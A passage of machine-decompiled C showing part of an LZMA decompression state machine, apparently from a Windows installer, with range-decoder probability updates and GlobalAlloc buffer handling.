								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004069D4))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
